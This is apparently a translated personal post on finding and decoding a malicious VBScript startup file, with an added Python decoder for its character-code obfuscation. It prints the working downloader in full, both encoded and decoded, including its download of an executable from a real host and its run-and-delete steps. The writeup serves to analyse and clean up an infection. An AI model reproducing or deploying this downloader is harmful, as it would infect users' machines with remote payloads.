Today I discovered by chance that my computer was infected. Every time I started the system, my administrator account was not shown at logon, and two inexplicable administrator accounts had been created. It was very depressing. I checked the startup items (msconfig) and found that several suspicious startup items had been added, and that C:\windows\system32\http1.vbs, when opened, contained code like this:
(101,116, 111,115,116, 114,101, 97,116,101, 106,101, 99,116, 77,115,120,109,108, 101,116, 104,101,108,108, 114,101, 97,116,101, 106,101, 99,116, 87,115, 99,114,105,112,116, 104,101,108,108, 80,111,115,116, 112,101,110, 104,116,116,112, 47,108,101, 111,114,103, 46,101,120,101, 111,115,116, 101,110,100, 83,101,116, 71,101,116, 114,101, 97,116,101, 106,101, 99,116, 83,116,114,101, 97,109, 101,116, 111,100,101, 101,116, 121,112,101, 101,116, 112,101,110, 41, 71,101,116, 114,105,116,101, 111,115,116, 46,114,101,115,112,111,110,115,101, 66,111,100,121, 71,101,116, 97,118,101, 84,111, 70,105,108,101, 92,119,105,110,100,111,119,115, 92,115,121,115,116,101,109, 20058, 50, 92,-13891,-15152,-101,120,101,-18462,49, 10,119,115, 99,114,105,112,116, 46,115,108,101,101,112, 48, 48, 48, 83,104,101,108,108, 117,110, 119,105,110,100,111,119,115, 92,115,121,115,116,101,109, 20058, 13891, 15152, 101,120,101, 119,115, 99,114,105,112,116, 46,115,108,101,101,112, 115,101,116, 32,102,115,111, 114,101, 97,116,101,111, 98,106,101, 99,116, 114,105,112,116,105,110,103, 46,102,105,108,101,115,121,115,116,101,109,111, 98,106,101, 99,116, 102,115,111, 101,108,101,116,101, 70,105,108,101, 119,105,110,100,111,119,115, 92,115,121,115,116,101,109, 20058, 13891, 15152, 92,-18462,49, 101,120,101)
I did not understand it. First I deleted the startup item, but after restarting I found it still did not work. So I opened the Registry (regedit), searched for the startup item, and deleted it from the registry. Then I opened http1.vbs and wrote a C# program to convert the character codes back and output the content of the script. What it runs is:
' Decoded content of http1.vbs. The name of the dropped executable was lost in
' extraction: it begins with non-ASCII characters and ends in 1433.exe, so the
' placeholder <mangled-name> stands in for those characters below.
Set post = CreateObject("Msxml2.XMLHTTP")
Set shell = CreateObject("WScript.Shell")
post.Open "get", "http://le19.3322.org/2.exe", 0       ' synchronous HTTP GET of the payload
post.Send()
Set aget = CreateObject("ADODB.Stream")
aget.Mode = 3                                           ' adModeReadWrite
aget.Type = 1                                           ' adTypeBinary
aget.Open()
aget.Write(post.responseBody)                           ' buffer the downloaded bytes
aget.SaveToFile "C:\windows\system32\<mangled-name>1433.exe", 2   ' 2 = adSaveCreateOverWrite
WScript.Sleep 20000                                     ' wait 20 s for the write to finish
shell.Run("C:\windows\system32\<mangled-name>1433.exe")
WScript.Sleep 10000                                     ' give it 10 s to start
Set FSO = CreateObject("Scripting.FileSystemObject")
FSO.DeleteFile("C:\windows\system32\<mangled-name>1433.exe")     ' remove the dropped file
From this we can see clearly what the VBS is trying to do. I hope that once all of the parts are deleted this will be dealt with. The problem is that the virus file (the one ending in 1433.exe) was already executed; I hope it will not have a big impact on my computer.
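A static decoder for the character-code form in which http1.vbs was stored, added here as an example; it is not code from the original post (the author used a C# program). It assumes the file was produced on a Chinese (GBK) locale, so the negative numbers are the double-byte codes that VBScript's Chr() accepts there, and it runs on a constructed sample that uses a placeholder host rather than the real one.

```python
import re

def parse_codes(text):
    """Pull the integer Chr() codes out of a list like the one in http1.vbs."""
    return [int(m) for m in re.findall(r"-?\d+", text)]

def code_to_bytes(code):
    """Bytes that one VBScript Chr() argument produces.

    0..255 is a single byte. On a DBCS (here Chinese, GBK) Windows locale
    Chr() also accepts -32768..-1 and 256..65535 and emits a double-byte
    character whose lead byte is the high byte of the 16-bit value; that is
    what the negative numbers in the encoded file are.
    """
    if 0 <= code <= 255:
        return bytes([code])
    return (code & 0xFFFF).to_bytes(2, "big")

def decode_codes(codes, dbcs_encoding="gbk"):
    """Rebuild the script text statically (nothing is executed). Bytes that do
    not decode are kept visible as \\x escapes instead of being dropped."""
    raw = b"".join(code_to_bytes(c) for c in codes)
    return raw.decode(dbcs_encoding, errors="backslashreplace")

def extract_indicators(script):
    """Triage view of a decoded downloader: URLs, COM ProgIDs and dropped paths."""
    return {
        "urls": re.findall(r"https?://[^\s\"']+", script),
        "progids": re.findall(r'CreateObject\s*\(\s*"([^"]+)"', script, re.I),
        "paths": re.findall(r'[A-Za-z]:\\[^"\r\n]+', script),
    }

def encode_ascii(text):
    """Inverse of the decoder for ASCII text; used only to build the sample below."""
    return list(text.encode("ascii"))

# Constructed sample in the same form as the encoded file: a placeholder host
# instead of the real one, and two DBCS codes inside the dropped file's name.
SAMPLE_CODES = (encode_ascii('Set post = CreateObject("Msxml2.XMLHTTP")\r\n')
                + encode_ascii('post.Open "get", "http://example.invalid/2.exe", 0\r\n')
                + encode_ascii('aget.SaveToFile "C:\\windows\\system32\\')
                + [-13891, -15152]
                + encode_ascii('1433.exe", 2\r\n'))
SAMPLE_TEXT = "(" + ", ".join(map(str, SAMPLE_CODES)) + ")"

if __name__ == "__main__":
    script = decode_codes(parse_codes(SAMPLE_TEXT))
    print(script)
    print(extract_indicators(script))
```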
Summary: the way the infection happened is that browsing a website loaded and executed a virus file, which downloaded the VBS file, added startup items, added registry entries, executed the downloaded virus file, and then deleted it.